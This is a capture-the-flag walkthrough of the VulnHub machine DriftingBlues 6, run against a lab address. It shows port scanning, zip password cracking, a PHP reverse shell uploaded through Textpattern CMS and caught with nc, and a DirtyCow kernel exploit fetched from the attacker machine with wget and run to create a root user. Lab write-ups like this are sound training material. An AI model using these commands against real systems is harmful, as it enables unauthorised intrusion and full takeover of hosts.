DRIFTINGBLUES: 6 WALKTROUGH

5 min readJun 6, 2021

Today we are going to take another boot2root challenge known as “DRIFTINGBLUES-6”. The credit for making this vulhnub machine goes to ‘ tasiyanci’and it is another boot2root challenge in which our goal is to get root access to complete the challenge.

URL: https://www.vulnhub.com/entry/driftingblues-6,672/

Security Level: Easy

Scanning

# netdiscover -i vboxnet0

We found our Targets IP Address 192.168.56.162. Our next step is to scan our targets IP Address with nmap.

Enumeration

# nmap -v -sC -sV -sT -O -A -p- 192.168.56.162

Starting Nmap 7.91 ( https://nmap.org ) at 2021–06–06 17:40 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:40
Completed NSE at 17:40, 0.00s elapsed
Initiating NSE at 17:40
Completed NSE at 17:40, 0.00s elapsed
Initiating NSE at 17:40
Completed NSE at 17:40, 0.00s elapsed
Initiating ARP Ping Scan at 17:40
Scanning 192.168.56.162 [1 port]
Completed ARP Ping Scan at 17:40, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:40
Completed Parallel DNS resolution of 1 host. at 17:40, 0.35s elapsed
Initiating Connect Scan at 17:40
Scanning 192.168.56.162 [65535 ports]
Discovered open port 80/tcp on 192.168.56.162
Completed Connect Scan at 17:40, 1.90s elapsed (65535 total ports)
Initiating Service scan at 17:40
Scanning 1 service on 192.168.56.162
Completed Service scan at 17:41, 6.08s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 192.168.56.162
NSE: Script scanning 192.168.56.162.
Initiating NSE at 17:41
Completed NSE at 17:41, 0.15s elapsed
Initiating NSE at 17:41
Completed NSE at 17:41, 0.01s elapsed
Initiating NSE at 17:41
Completed NSE at 17:41, 0.00s elapsed
Nmap scan report for 192.168.56.162
Host is up (0.00095s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/textpattern/textpattern
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: driftingblues
MAC Address: 08:00:27:97:52:E8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2–3.16
Uptime guess: 0.015 days (since Sun Jun 6 17:20:11 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=247 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT ADDRESS
1 0.95 ms 192.168.56.162

NSE: Script Post-scanning.
Initiating NSE at 17:41
Completed NSE at 17:41, 0.00s elapsed
Initiating NSE at 17:41
Completed NSE at 17:41, 0.00s elapsed
Initiating NSE at 17:41
Completed NSE at 17:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.53 seconds
Raw packets sent: 23 (1.806KB) | Rcvd: 15 (1.278KB)

From nmap result we found HTTP service is running on port 80. So, we browsed the Targets IP Address in the browser. Let’s explore the webpage ….!

So , Firstly i manually try and see /robots.txt file. In this file we see some entry like /textpattern/textpattern. We found Textpattern login page I try default user and password but nothing found. so i search some directory with gobuster command.

# gobuster dir -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.56.162 -x php

I go one by one directory and find some zip file in /spammer directory. Download zip file . Let’s time to extract it but it is password protect. In the spammer directory some credits.txt file. I use default password admin but it is wrong. I search on googled how to crack zip file.

# fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt /root/Downloads/spammer.zip

And the password is myspace4. Let’s login to creadts.txt file.

Next we found 1 user name : mayer & 1 password : lionheart let’s login to textpattern cms.

Before upload the php file check the lhost and lport.

Time to upload php reverse shell.

Location:

Content > Files > Upload a php file.

We have successfully upload a php .Next step to run php-reverse-shell.php and take reverse shell. Run listner on attacker pc.

Php file Run location :-

$ http://192.168.56.162/textpattern/files/php-reverse-shell.php > file upload location

# nc -nlvp 443

We got a reverse shell.

Check TTY shell or not
# tty
Import tty shell :-

# python -c ‘import pty; pty.spawn(“/bin/bash”)’

Check Kernel Version

# uname -a

Linux driftingblues 3.2.0–4-amd64 #1 SMP Debian 3.2.78–1 x86_64 GNU/Linux

Search exploit on google. And it is vulnerable . I downlaod it.

Time to send .c file in victim machine.

# python -m SimpleHTTPServer 80 run on attacker machine

Back to Victim machine

# cd /tmp

# wget http://192.168.56.1/40839.c

# ls -lah

# gcc -pthread 40839.c -o dirty -lcrypt

# ./dirty

Please enter the new password: 12345
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash

mmap: 7f3b4a2d5000
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username ‘firefart’ and the password ‘12345’.

DON’T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash

mmap: 7f3b4a2d5000
madvise 0

Done! Check /etc/passwd to see if the new user was created.
You can log in with the username ‘firefart’ and the password ‘12345’.

DON’T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

After this we have a new firefart user.

# mv /tmp/passwd.bak /etc/passwd

# su firefart

Password :12345

# id

# cd /root

# cat flag.txt